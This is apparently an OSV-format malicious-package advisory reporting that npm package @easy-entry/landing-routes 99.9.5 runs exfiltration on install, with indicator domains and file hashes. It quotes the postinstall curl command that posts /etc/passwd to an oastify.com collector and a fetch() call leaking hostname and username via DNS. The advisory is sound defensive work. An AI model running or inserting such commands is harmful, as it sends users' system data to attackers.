{"id":"MAL-2026-5408","summary":"Malicious code in @easy-entry/landing-routes (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556)\nOn `npm install`, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First, package.json line 4 invokes `/usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, posting the installer's `/etc/passwd` to a DNS-logging subdomain that encodes the victim's hostname. Second, scripts/scream3gg.js reads `os.hostname()`, `os.homedir()`, and `os.userInfo().username`, hex-encodes them, and issues `fetch('http://' + safeData + '.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com')`, leaking host identifiers via DNS+HTTP. Both paths fire automatically on default install with no opt-in.\n","modified":"2026-06-09T18:01:29.861165057Z","published":"2026-06-09T17:18:44Z","database_specific":{"malicious-packages-origins":[{"sha256":"16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556","import_time":"2026-06-09T17:45:49.398759157Z","id":"IN-MAL-2026-005019","versions":["99.9.5"],"source":"amazon-inspector","modified_time":"2026-06-09T17:18:44Z"},{"sha256":"1cba0345cf355b11407a4df4920609c18b072e0c993445f86484813768961369","import_time":"2026-06-09T17:45:49.451544597Z","modified_time":"2026-06-09T17:18:44Z","versions":["99.9.5"],"source":"amazon-inspector","id":"IN-MAL-2026-005020"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@easy-entry/landing-routes/v/99.9.5"}],"affected":[{"package":{"name":"@easy-entry/landing-routes","ecosystem":"npm","purl":"pkg:npm/%40easy-entry%2Flanding-routes"},"versions":["99.9.5"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/landing-routes/MAL-2026-5408.json","indicators":{"domains":["2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e2d666535376161356263396562.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"],"package_integrity":[{"hashes":{"sha512_sri":"sha512-6KdmTOrXanUVAlLuqEl/7PdHvIOT+wLTbDTNHzW/dLZVbASOaXvCGswMqp6d9dLhOzhOqQxB5ok28qc8LppO6w==","sha1":"8d7f5fc40b957af790bb0c4b6461e6a783fbb19a"},"filename":"landing-routes-99.9.5.tgz"}],"evidence_files":[{"sha256":"9c65010f1c2d82de2f1d092a61670248ed69db99b174512daabbe6f86cf964d3","path":"package.json","tlsh":"58d0a7b07810c7b379cd06778118a1557d65c95b120479a645df87e5912436278e6906"},{"sha256":"9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9","path":"scripts/scream3gg.js","tlsh":"74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}